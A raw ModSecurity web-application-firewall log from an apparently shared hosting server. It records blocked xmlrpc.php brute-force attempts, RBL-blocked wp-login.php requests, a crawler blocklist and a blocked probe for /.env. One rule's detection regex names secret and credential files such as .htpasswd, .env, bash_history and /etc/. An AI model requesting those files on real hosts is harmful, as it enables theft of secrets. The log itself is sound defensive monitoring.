[Tue May 26 19:29:11.136955 2026] [security2:error] [pid 49598:tid 49759] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnLuzJzkdc0WtdrwtjWQAAAKQ"]
[Tue May 26 19:29:11.607768 2026] [security2:error] [pid 49598:tid 49792] [client 167.160.68.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnL-zJzkdc0WtdrwtjcgAAAMU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 19:29:11.791347 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:17539] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnL-zJzkdc0WtdrwtjdwAAAIo"]
[Tue May 26 19:29:11.791491 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:17539] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnL-zJzkdc0WtdrwtjdwAAAIo"]
[Tue May 26 19:29:12.309001 2026] [security2:error] [pid 49598:tid 49660] [remote 217.174.148.171:45486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnMOzJzkdc0WtdrwtjgQAAtD0"]
[Tue May 26 19:29:12.569279 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:32063] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMOzJzkdc0WtdrwtjjgAAAL8"]
[Tue May 26 19:29:12.569382 2026] [security2:error] [pid 49598:tid 49786] [client 91.245.236.124:32063] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMOzJzkdc0WtdrwtjjgAAAL8"]
[Tue May 26 19:29:12.745285 2026] [security2:error] [pid 49598:tid 49647] [remote 212.224.100.2:19929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnMOzJzkdc0WtdrwtjjQAAizA"]
[Tue May 26 19:29:13.105892 2026] [security2:error] [pid 49598:tid 49793] [client 66.132.195.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahWnMezJzkdc0WtdrwtjnwAAAMY"]
[Tue May 26 19:29:13.334847 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:58499] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMezJzkdc0WtdrwtjqQAAANo"]
[Tue May 26 19:29:13.334971 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:58499] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMezJzkdc0WtdrwtjqQAAANo"]
[Tue May 26 19:29:13.879451 2026] [security2:error] [pid 49598:tid 49838] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnMezJzkdc0WtdrwtjrAAAAPM"]
[Tue May 26 19:29:14.100795 2026] [security2:error] [pid 49598:tid 49735] [client 91.245.236.124:18887] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMuzJzkdc0WtdrwtjuQAAAIw"]
[Tue May 26 19:29:14.100905 2026] [security2:error] [pid 49598:tid 49735] [client 91.245.236.124:18887] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMuzJzkdc0WtdrwtjuQAAAIw"]
[Tue May 26 19:29:14.341175 2026] [security2:error] [pid 49598:tid 49804] [client 14.232.228.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnMezJzkdc0WtdrwtjsgAAANE"]
[Tue May 26 19:29:14.630159 2026] [security2:error] [pid 49598:tid 49668] [remote 115.79.143.180:39484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.143.79.115.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnMuzJzkdc0WtdrwtjxAAAiEU"]
[Tue May 26 19:29:14.878722 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:35557] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMuzJzkdc0Wtdrwtj0gAAAMQ"]
[Tue May 26 19:29:14.878849 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:35557] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnMuzJzkdc0Wtdrwtj0gAAAMQ"]
[Tue May 26 19:29:15.348924 2026] [security2:error] [pid 49598:tid 49659] [remote 153.122.170.42:52642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWnM-zJzkdc0Wtdrwtj1gAA1zw"]
[Tue May 26 19:29:15.586018 2026] [security2:error] [pid 49598:tid 49759] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnM-zJzkdc0Wtdrwtj2QAAAKQ"]
[Tue May 26 19:29:15.608850 2026] [security2:error] [pid 49598:tid 49661] [remote 212.224.100.2:19929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnM-zJzkdc0Wtdrwtj4QAAiT4"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:29:15.645319 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:40231] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnM-zJzkdc0Wtdrwtj5QAAAIo"]
[Tue May 26 19:29:15.645447 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:40231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnM-zJzkdc0Wtdrwtj5QAAAIo"]
[Tue May 26 19:29:15.788602 2026] [security2:error] [pid 49598:tid 49748] [client 45.131.193.15:22805] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.193.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mpdpl.in"] [uri "/wp-login.php"] [unique_id "ahWnM-zJzkdc0Wtdrwtj4AAAAJk"]
[Tue May 26 19:29:16.025333 2026] [security2:error] [pid 49598:tid 49673] [remote 217.174.148.171:45486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnM-zJzkdc0Wtdrwtj7AAAt0o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:29:16.161456 2026] [security2:error] [pid 49598:tid 49760] [client 167.160.68.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWnNOzJzkdc0Wtdrwtj8gAAAKU"], referer: https://anujtradingco.com
[Tue May 26 19:29:16.426974 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:58371] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNOzJzkdc0Wtdrwtj9gAAAOU"]
[Tue May 26 19:29:16.427101 2026] [security2:error] [pid 49598:tid 49824] [client 91.245.236.124:58371] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNOzJzkdc0Wtdrwtj9gAAAOU"]
[Tue May 26 19:29:16.461348 2026] [security2:error] [pid 49598:tid 49680] [remote 153.122.170.42:52642] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.170.122.153.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWnNOzJzkdc0Wtdrwtj-gAAl1E"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:29:16.743443 2026] [security2:error] [pid 49598:tid 49676] [remote 115.79.143.180:39484] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.143.79.115.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnNOzJzkdc0WtdrwtkBAAA5k0"], referer: https://triviewsolutions.com/wp-login.php
[Tue May 26 19:29:16.972535 2026] [security2:error] [pid 49598:tid 49678] [remote 38.95.35.74:57974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWnNOzJzkdc0WtdrwtkBQAAwE8"]
[Tue May 26 19:29:17.203296 2026] [security2:error] [pid 49598:tid 49736] [client 91.245.236.124:18265] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNezJzkdc0WtdrwtkFAAAAI0"]
[Tue May 26 19:29:17.203401 2026] [security2:error] [pid 49598:tid 49736] [client 91.245.236.124:18265] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNezJzkdc0WtdrwtkFAAAAI0"]
[Tue May 26 19:29:17.208637 2026] [security2:error] [pid 49598:tid 49645] [remote 38.95.35.74:57974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWnNezJzkdc0WtdrwtkEgAAuC4"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:29:17.984105 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:28785] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNezJzkdc0WtdrwtkMAAAAKU"]
[Tue May 26 19:29:17.984213 2026] [security2:error] [pid 49598:tid 49760] [client 91.245.236.124:28785] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNezJzkdc0WtdrwtkMAAAAKU"]
[Tue May 26 19:29:18.459390 2026] [security2:error] [pid 49598:tid 49756] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnNuzJzkdc0WtdrwtkNAAAAKE"]
[Tue May 26 19:29:18.750295 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:20717] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNuzJzkdc0WtdrwtkTgAAANg"]
[Tue May 26 19:29:18.750419 2026] [security2:error] [pid 49598:tid 49811] [client 91.245.236.124:20717] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnNuzJzkdc0WtdrwtkTgAAANg"]
[Tue May 26 19:29:19.060350 2026] [security2:error] [pid 49598:tid 49755] [client 102.129.255.177:36165] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "208.91.198.65"] [uri "/.env"] [unique_id "ahWnN-zJzkdc0WtdrwtkVQAAAKA"]
[Tue May 26 19:29:19.532283 2026] [security2:error] [pid 49598:tid 49832] [client 91.245.236.124:41209] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnN-zJzkdc0WtdrwtkYwAAAO0"]
[Tue May 26 19:29:19.532385 2026] [security2:error] [pid 49598:tid 49832] [client 91.245.236.124:41209] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnN-zJzkdc0WtdrwtkYwAAAO0"]
[Tue May 26 19:29:20.603903 2026] [security2:error] [pid 49598:tid 49814] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnOOzJzkdc0WtdrwtkdgAAANs"]
[Tue May 26 19:29:20.818384 2026] [security2:error] [pid 49598:tid 49762] [client 91.245.236.124:46131] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnOOzJzkdc0WtdrwtkeQAAAKc"]
[Tue May 26 19:29:20.818516 2026] [security2:error] [pid 49598:tid 49762] [client 91.245.236.124:46131] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnOOzJzkdc0WtdrwtkeQAAAKc"]
[Tue May 26 19:29:21.595934 2026] [security2:error] [pid 49598:tid 49782] [client 91.245.236.124:27579] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnOezJzkdc0WtdrwtkmAAAALs"]
[Tue May 26 19:29:21.596098 2026] [security2:error] [pid 49598:tid 49782] [client 91.245.236.124:27579] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnOezJzkdc0WtdrwtkmAAAALs"]
[Tue May 26 19:29:22.038315 2026] [security2:error] [pid 49598:tid 49770] [client 185.191.171.6:46990] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWnOuzJzkdc0WtdrwtkpgAAAK8"]
[Tue May 26 19:29:22.038654 2026] [security2:error] [pid 49598:tid 49770] [client 185.191.171.6:46990] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWnOuzJzkdc0WtdrwtkpgAAAK8"]
[Tue May 26 19:29:22.146543 2026] [security2:error] [pid 49598:tid 49778] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnOezJzkdc0WtdrwtkoQAAALc"]
[Tue May 26 19:29:22.363353 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:63819] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnOuzJzkdc0WtdrwtktAAAAJg"]
[Tue May 26 19:29:22.363492 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:63819] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnOuzJzkdc0WtdrwtktAAAAJg"]
[Tue May 26 19:29:22.609856 2026] [security2:error] [pid 49598:tid 49718] [remote 216.73.216.30:54626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWnOuzJzkdc0WtdrwtkuwAA2Xc"]
[Tue May 26 19:29:23.125515 2026] [security2:error] [pid 49598:tid 49830] [client 91.245.236.124:16743] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnO-zJzkdc0WtdrwtkyQAAAOs"]
[Tue May 26 19:29:23.125639 2026] [security2:error] [pid 49598:tid 49830] [client 91.245.236.124:16743] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnO-zJzkdc0WtdrwtkyQAAAOs"]
[Tue May 26 19:29:23.888390 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:45637] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnO-zJzkdc0Wtdrwtk4wAAAJ0"]
[Tue May 26 19:29:23.888498 2026] [security2:error] [pid 49598:tid 49752] [client 91.245.236.124:45637] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnO-zJzkdc0Wtdrwtk4wAAAJ0"]
[Tue May 26 19:29:23.935307 2026] [security2:error] [pid 49598:tid 49782] [client 203.19.38.114:13466] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWnO-zJzkdc0Wtdrwtk0AAAALs"], referer: https://www.cagmedya.com/dijital-donusumde-profesyonel-web-tasarimi/
[Tue May 26 19:29:24.668153 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:63077] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPOzJzkdc0Wtdrwtk8AAAAMQ"]
[Tue May 26 19:29:24.668325 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:63077] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPOzJzkdc0Wtdrwtk8AAAAMQ"]
[Tue May 26 19:29:25.074569 2026] [security2:error] [pid 49598:tid 49733] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnPOzJzkdc0Wtdrwtk7wAAAIo"]
[Tue May 26 19:29:25.431919 2026] [security2:error] [pid 49598:tid 49766] [client 91.245.236.124:62067] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPezJzkdc0WtdrwtlBgAAAKs"]
[Tue May 26 19:29:25.432073 2026] [security2:error] [pid 49598:tid 49766] [client 91.245.236.124:62067] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPezJzkdc0WtdrwtlBgAAAKs"]
[Tue May 26 19:29:26.208263 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:26373] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPuzJzkdc0WtdrwtlGQAAAN0"]
[Tue May 26 19:29:26.208413 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:26373] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnPuzJzkdc0WtdrwtlGQAAAN0"]
